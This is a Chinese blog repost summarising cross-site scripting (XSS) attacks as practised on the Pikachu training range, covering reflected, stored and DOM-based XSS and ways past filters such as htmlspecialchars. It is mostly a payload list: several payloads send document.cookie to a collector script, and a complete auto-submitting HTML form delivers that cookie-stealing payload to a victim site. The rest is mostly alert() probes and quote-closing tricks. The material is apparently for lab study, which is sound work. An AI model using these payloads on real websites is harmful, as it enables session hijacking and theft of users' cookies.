xss总结

最新推荐文章于 2024-03-27 17:03:23 发布
最新推荐文章于 2024-03-27 17:03:23 发布
阅读量291 收藏
点赞数
分类专栏: web安全 文章标签: web xss
原文链接:https://www.cnblogs.com/dogecheng/p/11556221.html
版权

xss总结

1.常用payload
1.//配合xss后台使用
<script>document.location='http://127.0.0.1?cookie=' + document.cookie</script>
或
<img src=x onerror=a=document.cookie;document.location='http://192.168.0.113:8080/pikachu/pkxss/xcookie/cookie.php?cookie='+a >

2.//在href中使用javascript伪协议
<a href="javascript:alert(111)">

3.//payload被加入href,闭合引号绕过href
' onclick=alert(1111) '
或
#' onclick=alert("xss")>

4.//payload被加入动态js中,闭合原来js,加入新的js
'</script><script>alert('xss')</script>

5.//其他
<body onload=alert('XSS')>
<img src=x onerror=alert(1)>
<div onclick="alert('xss')">

xss payload大全参考:https://www.cnblogs.com/xuehen/p/4814237.html

2.常见xss类型
2.1 反射型
2.1.1 GET

构造钓鱼url,发给受害者,等待受害者点击即可

http://127.0.0.1/xss_reflected_get.php?message=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&submit=submit
2.1.2 POST

无法直接构造钓鱼url,需要自己搭建post表单网站,诱导受害者点击

//post.html
<html>
<head>
<script>
    //自动点击,提交post表单
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post"           //受害者网站         action="http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>                //攻击者xss后台窃取cookie的payload
document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
2.2 存储型

一般出现在留言板等,危害较大,payload直接写在留言板即可

2.3 DOM型
// 这里有段JS代码,它通过 getElementById 获取到了标签 Id 为 text的内容赋值给str
//然后又把 str 的内容通过字符串拼接的方式写到了 a 标签的 href 属性中,a标签会写到 Id 为 dom的 div 标签中
<script>

                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试:'><img src="#" οnmοuseοver="alert('xss')">
                    //试试:' οnclick="alert('xss')">,闭合掉就行
 </script>

<div id="dom"><a href="test">what do you see?</a></div>

payload构造

' onclick=alert(1111) '
或
#' onclick=alert("xss")>
或
javascript:alert(111)
3.绕过xss过滤
3.1 转换
  • 前端限制绕过,直接抓包重放,或者修改html前端代码。比如反射型XSS(get)中限制输入20个字符。
  • 大小写,比如pt>。后台可能把
3.2 编码

当它输出到前端的时候,浏览器会对这个编码进行翻译,从而弹窗

3.3 htmlspecialchars

关于htmlspecialchars()函数

htmlspecialchars()是PHP里面把预定义的字符转换为HTML实体的函数

预定义的字符是

  • & 成为 &amp

  • " 成为 &quot

  • ’ 成为 &#039

  • < 成为 &lt

  • > 成为 &gt

    可用引号类型

  • ENT_COMPAT:默认,仅编码双引号

  • ENT_QUOTES:编码双引号和单引号

  • ENT_NOQUOTES:不编码任何引号

可以使用一些不带这些特殊符号的payload,如 javascript:alert(111)

附加 xss之动态js
//输入框中输入的test,赋值给了js中的$ms变量

<script>
    $ms='test';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }

</script>

payload

//闭合原来的js,加入新的js

'</script><script>alert('xss')</script>
不疯魔,不成活。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xss总结
code_lab
06-13 731
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);> 2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。 3. 输出在HTML属性里的情况有时候,输
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
XSS总结
weixin_30888707的博客
04-09 105
XSS是什么 1.跨站攻击脚本 复制代码 xss过滤方法 输入过滤输出编码 输入验证:输入是否仅仅是合法的字符 输入字符串是否超过最大限制 输入如果是数字,是否在指定的范围内 输入是否符合格式要求:如ip地址或者email地址 输入是否过滤了敏感字...
xss总结
最新发布
qq_45752705的博客
03-27 331
一、xss简介什么是XSSXXS攻击目的是在网页中嵌入客户端恶意脚本,最常用的攻击代码是JavaScriptXSS漏洞出现的原因程序对输入和输出的控制不够严格,导致"精心构造“的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害XSS的危害劫持用户cookie、点击构造的链接触发劫持cookie、框架钓鱼、刷流量、挂马、键盘记录、需要设置跨域二、xss的分类反射型XSS 中危。
xss 总结
0ffs3t
10-18 5363
document.getElementById("y").innerHTML="xxxxxxxxxx"; document.write("xxxxxxxxxxxx"); $("#y").html("xxxxxxx"); aa.innerHTML="xxxxxxxxxxxx";  这种情况下。xxxxx只能使用 这种方式来触发JS。
XSS跨站总结
02-09
一篇文档,让你理解XSS跨站攻防的来龙去脉
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
xss-vuln学习通关总结
08-24
个人总结类文档。
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS利用XSS的防御进行总结,分章节进行叙述,可作为学习文档。
XSS简单总结
Aiwin的博客
07-11 974
XSS的简单总结
XSS知识总结
weixin_64051447的博客
04-26 1682
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
XSS总结
孤的博客
10-02 464
原理 开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的...
XSS知识的总结
dgy610927的专栏
10-28 932
一、XSS简介 跨站点脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种站点应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的
XSS学习总结21篇
qq_45300786的博客
06-18 618
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出 这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的) 一、html标签里可以继续写html标签 <p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p> 二、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html) HTML 属性 HTML 元素可
xss漏洞 pikachu
08-13
XSS漏洞是一种Web应用程序中常见的安全漏洞,它允许攻击者将恶意代码注入到受信任的网页中,从而实施各种攻击,例如窃取用户的敏感信息、会话劫持等。在文章中引用的内容提到了关于Pikachu靶场的XSS漏洞学习总结和详解。Pikachu靶场是一个针对XSS漏洞进行训练和测试的平台,它提供了不同级别和类型的XSS漏洞供用户学习和实践。文章中列举了许多关卡,涵盖了反射型XSS、存储型XSS、DOM型XSS等不同类型的XSS漏洞。此外,还提到了DOM-X型危害更大,因为它可以在URL中体现,将URL发给受害者就能进行攻击的特点。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Pikachu靶场之XSS漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124747885)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值